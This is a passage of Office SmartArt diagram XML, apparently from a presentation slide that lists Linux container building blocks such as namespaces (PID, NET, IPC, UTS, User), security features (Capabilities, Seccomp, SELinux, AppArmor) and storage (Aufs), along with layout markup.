    <dgm:pt modelId="{CE829FA0-E8BC-45E1-840B-8D150B001777}" type="parTrans" cxnId="{2028A836-84AB-4A8C-89B1-58BB6EF2F73D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78757145-514B-4499-ADCC-DB6F09CCD799}" type="sibTrans" cxnId="{2028A836-84AB-4A8C-89B1-58BB6EF2F73D}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{879232AE-EBB8-4D24-A29B-DAB7F76442BC}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Memory</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{32B66B13-4D90-495D-9A86-13E866F49510}" type="parTrans" cxnId="{4620290C-72F4-4622-84B0-017D3EEDFE6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{900DD4D4-5608-424E-ABC9-2EA8E030A734}" type="sibTrans" cxnId="{4620290C-72F4-4622-84B0-017D3EEDFE6F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{ABA39408-5CF8-44FF-A5EE-E3B86003C438}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>IPC</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B36A20ED-36D2-4454-BA55-1407E12AE4F3}" type="parTrans" cxnId="{D07AE95E-CA25-4A8E-8286-4C5A65D2034A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DBC2333-CBAD-49B8-92E8-287D13ECAA5E}" type="sibTrans" cxnId="{D07AE95E-CA25-4A8E-8286-4C5A65D2034A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7AD760EE-BC2F-4251-9A86-BC65A6891C47}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>UTS</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{965B92D5-4333-4D12-9D9A-D5651D0AAD6A}" type="parTrans" cxnId="{82C5AC47-8BE8-4B27-9861-B2A597B5A81B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{46F30D45-807B-4319-8B4F-DE7D07E4BD60}" type="sibTrans" cxnId="{82C5AC47-8BE8-4B27-9861-B2A597B5A81B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{535AD3BE-3F4B-4348-A006-6732B1DA278A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>NET</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A9AE6856-D43F-4CD6-A7F3-065F6BE94857}" type="parTrans" cxnId="{2F38B66A-F4E1-4A8F-97F3-D066A21DCEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E259BF91-2ABB-47A3-9F2E-201930BF661D}" type="sibTrans" cxnId="{2F38B66A-F4E1-4A8F-97F3-D066A21DCEC9}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E0F7C7D-5750-42D3-A222-8AB979E3895A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Device</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1385EB2D-FB81-4D55-BE5D-44283FF7DAF6}" type="parTrans" cxnId="{A9716BED-9DAC-49D2-9AFC-3DF9587927C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CFA20DD0-6050-486A-AB38-2F8F9225834A}" type="sibTrans" cxnId="{A9716BED-9DAC-49D2-9AFC-3DF9587927C5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>PID</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0DE263CE-4062-4D24-A2A0-7BE3C5615DAF}" type="sibTrans" cxnId="{168B3EDB-CC20-4840-AB85-CEC66ECDFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{560374E7-197C-4123-9F66-8A461BCBF9C1}" type="parTrans" cxnId="{168B3EDB-CC20-4840-AB85-CEC66ECDFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DF5B84DF-553E-4EEA-8B4F-86D02FA96E5A}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Security</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2C616E6A-A02F-48C0-A44F-F16EEA04A424}" type="parTrans" cxnId="{EA68FE2D-5FED-4F44-86AC-D0EAA510CF1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F280F600-7E5D-4CFC-B42A-299CBF32880A}" type="sibTrans" cxnId="{EA68FE2D-5FED-4F44-86AC-D0EAA510CF1E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A186CC1-BD45-4AE6-BE75-2E345A9F5B43}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{30341EB1-A5A7-4C0C-9804-D158D0CA62FD}" type="parTrans" cxnId="{26732EFD-C79B-4358-9EAE-D8663F7B7C34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{879A265B-1570-43A4-BB99-12DEBC55C5D3}" type="sibTrans" cxnId="{26732EFD-C79B-4358-9EAE-D8663F7B7C34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93D1CFF2-A5F9-4CC1-A45E-2694267F6C95}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>Seccomp</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95812017-0B8E-4EB8-8134-7DE8A62CAAD0}" type="parTrans" cxnId="{D8E41ACF-A800-4A3B-AB30-4CFF9CA5EBEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3EB6D26F-7EF7-4AB8-A18D-ED027EFE0B00}" type="sibTrans" cxnId="{D8E41ACF-A800-4A3B-AB30-4CFF9CA5EBEE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D0821A2-692D-4623-9674-83E1A1DC5B47}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>SELinux</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FDDEF26-78F9-4000-9151-C51058ECCFDD}" type="parTrans" cxnId="{2E551E21-812D-43A7-9566-7BE81F44EB5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{703E7969-2BCC-49E2-A22B-B0450F52703F}" type="sibTrans" cxnId="{2E551E21-812D-43A7-9566-7BE81F44EB5F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C2E702EB-61A2-45BC-BFF3-CA1CB09AF24D}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EB09B976-F585-4BF4-B02A-9ED1B3E558AB}" type="parTrans" cxnId="{C57F7888-E738-4F2E-B7E7-377E18F74CE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AF92CB18-135D-4660-B2A6-8E116C11AFFC}" type="sibTrans" cxnId="{C57F7888-E738-4F2E-B7E7-377E18F74CE7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="tx1">
            <a:lumMod val="85000"/>
            <a:lumOff val="15000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1DD49B71-A4B8-4525-A74F-D4CB8A486CFA}" type="sibTrans" cxnId="{0C3C0EDC-EA54-444D-8A29-E00E327BDF7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{650E6585-D98C-4861-BCCA-60882A51B92F}" type="parTrans" cxnId="{0C3C0EDC-EA54-444D-8A29-E00E327BDF7F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            <a:t>User</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C506AC9B-A08C-4C4D-8545-A004502A691F}" type="parTrans" cxnId="{A3AA84A7-82BF-48CE-B7B7-13CCF4CF9FF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95355D91-FA21-49D3-83A7-629DDC916D6D}" type="sibTrans" cxnId="{A3AA84A7-82BF-48CE-B7B7-13CCF4CF9FF7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B9F92858-7F48-4B01-B69D-353226BC13C9}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2">
            <a:lumMod val="75000"/>
          </a:schemeClr>
        </a:solidFill>
      </dgm:spPr>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
            <a:t>Aufs</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F9F319E0-9BBF-4DDC-9940-27054B2A02D5}" type="parTrans" cxnId="{985802D9-601C-470C-861F-B4E7C6491141}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EA8EE19-290A-465C-9FFA-15A75F81C11B}" type="sibTrans" cxnId="{985802D9-601C-470C-861F-B4E7C6491141}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{92C5A80F-7CC6-4D72-B464-399D7EC7DE24}" type="pres">
      <dgm:prSet presAssocID="{0ABF6E7A-4AF7-4A54-84D4-3CEEF8EA9E5B}" presName="theList" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5FE7B954-E856-4893-8A09-00B84312DF0A}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{30CE6A75-3FF8-4194-99FE-9831B266366F}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A32E4856-A4AD-46CF-84A8-3D668486E544}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BDB489C2-AB41-495E-B2D1-24579A6FCFC1}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E1E0C623-0471-415F-B290-194C00372F81}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{12D643E0-AF48-4183-BB35-81B6A0C9602C}" type="pres">
      <dgm:prSet presAssocID="{42C962FC-1D78-43BA-B0CF-137A2840F445}" presName="childNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5D9E89F8-0476-40AA-B726-89F90EA1EE51}" type="pres">
      <dgm:prSet presAssocID="{42C962FC-1D78-43BA-B0CF-137A2840F445}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B22F2000-CB74-453E-B358-5701BFC71E06}" type="pres">
      <dgm:prSet presAssocID="{B9F92858-7F48-4B01-B69D-353226BC13C9}" presName="childNode" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A91538A2-C9D2-43A7-83AD-664ECBE124F3}" type="pres">
      <dgm:prSet presAssocID="{B9F92858-7F48-4B01-B69D-353226BC13C9}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{842C65AE-1601-4DFE-91A4-DE6A3AA19EB9}" type="pres">
      <dgm:prSet presAssocID="{4A71EB0B-D69A-44D8-97C1-8BAE0C986272}" presName="childNode" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1642BF6E-B815-49CA-9D8D-A3EDC0FA3181}" type="pres">
      <dgm:prSet presAssocID="{A69912F1-DC08-438B-91AD-B61A2AEE9E99}" presName="aSpace" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{24F39EA9-872B-4793-A06E-B269342C502A}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBB82117-9837-4D37-BC7F-DB3F82D556BC}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="aNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4" custLinFactNeighborX="0" custLinFactNeighborY="2602"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2912360F-2CE9-41DD-84E2-A113FA90909C}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="textNode" presStyleLbl="bgShp" presStyleIdx="1" presStyleCnt="4"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{217AA398-71F8-4B52-A94D-F9B649FB41A0}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="compChildNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{247782A7-8AF2-4A0D-9C02-9765EF054683}" type="pres">
      <dgm:prSet presAssocID="{3308BB54-327E-48E4-AFA3-CC75936853A2}" presName="theInnerList" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7072083A-8581-4329-9DA0-477B82581EDE}" type="pres">
      <dgm:prSet presAssocID="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}" presName="childNode" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EDBCD22F-3FDD-4D77-B533-DE9FA35276C6}" type="pres">
      <dgm:prSet presAssocID="{5720833B-25DC-474B-BC4B-BE3EBF0F9BE8}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{16C8F441-0E86-4BA4-8205-623AF8A01764}" type="pres">
      <dgm:prSet presAssocID="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}" presName="childNode" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E87DB7A6-E225-4EC0-8FB8-1087809CBFA2}" type="pres">
      <dgm:prSet presAssocID="{B0B8EA53-BF56-42F4-AC13-46C06C08C8C1}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D9DE7586-6054-4E01-82D6-6CA481C824AF}" type="pres">
      <dgm:prSet presAssocID="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}" presName="childNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="16">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BAC1984-F7DB-448A-9A0E-122747079244}" type="pres">
      <dgm:prSet presAssocID="{F7629425-DF99-4D3C-8DCA-869B9EFE16C0}" presName="aSpace2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
